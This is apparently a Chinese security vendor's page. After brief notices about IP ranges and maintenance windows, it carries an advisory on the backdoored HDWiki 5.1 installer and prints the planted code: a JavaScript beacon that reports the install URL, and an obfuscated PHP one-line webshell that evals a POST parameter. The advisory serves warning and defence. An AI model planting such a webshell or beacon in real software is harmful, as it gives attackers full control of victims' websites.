为提供更好更优质的云防御服务,我们将于近期对机房节点进行优化和调整,部分节点IP将不再提供服务,涉及IPv4网段:112.45.27.128/25、119.39.205.0/25、42.202.155.128/25,IPv6网段:2409:8c62:e10:8:0:2::/96、2408:8752:100:4:0:1::/96、240e:90d:1101:4703::/96。
接江苏联通运营商通知,将于北京时间2026-1-21 00:00至03:00对淮安联通机房进行割接维护,涉及 IP段112.84.222.0/25 、2408:873C:9810:1000::/96。
为提供更好更优质的云监测服务,我们将于北京时间2025-12-25 23:00~24:00对机房进行割接维护,更新部分ScanV扫描出口IP,涉及以下IP、网段的变更: IPv4:182.140.244.222 变更为 182.140.195.128/27 IPv6:240e:d9:a003:1602::/64 变更为 240e:974:e200:4200::/56
获取最新安全动态
9月20日消息,今日安全联盟站长平台(zhanzhang.anquan.org)接到漏洞修复专家反馈信息称HDWiki百科建站系统“HDWiki5.1 正式版”(包括UTF8和GBK版本)下载安装包文件里被植入恶意网站木马(后门)文件。安全联盟研究人员立即确认并分析了该“木马后门”,初步推断官方网站被黑客入侵后,在最新HDwiki的下载安装包里植入了恶意网站木马文件,当站长用户下载安装后,会把该网站木马文件直接带入到站长的网站上,然后黑客可通过该该网站木马完全控制站长用户的网站系统,使网站沦为“肉鸡”。目前安全联盟站长平台已积极联系HDwiki官方,并发布紧急预警,目前请站长朋友们暂停下载安装HDWiki百科建站系统,对近期下载安装过HDwiki的朋友,百度加速乐(jiasule.baidu.com)联合安全联盟站长平台提供独家解决方案。
后门文件分析
经过我们分析,在HDWiki安装文件包里的文件做了如下修改:
一、在文件/hdwiki/install/install.php里 83-84行加入了如下代码:
if(!window.x){
(function(){(new Image()).src='http://kaiyuan.hudong.com/count2/install.php?location='+escape((function(){try{return document.location.href}catch(e){return ''}})());})();
二、增加一个php文件,也就是我们的木马文件,位置在/hdwiki/js/jqeditor/skins/bg/index.php 代码如下:
<?php
/*
[UCenter] (C)2001-2009 Comsenz Inc.
This is NOT a freeware, use is subject to license terms
$Id: client.php 913 2009-01-12 03:48:34Z zhaoxiongfei $
*/
$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[马赛克]);
?>
代码经过了编码加密,我们解密后确认该代码就是一个恶意的网站木马文件(编码加密过的“一句话木马”)。售前支持
400-161-0866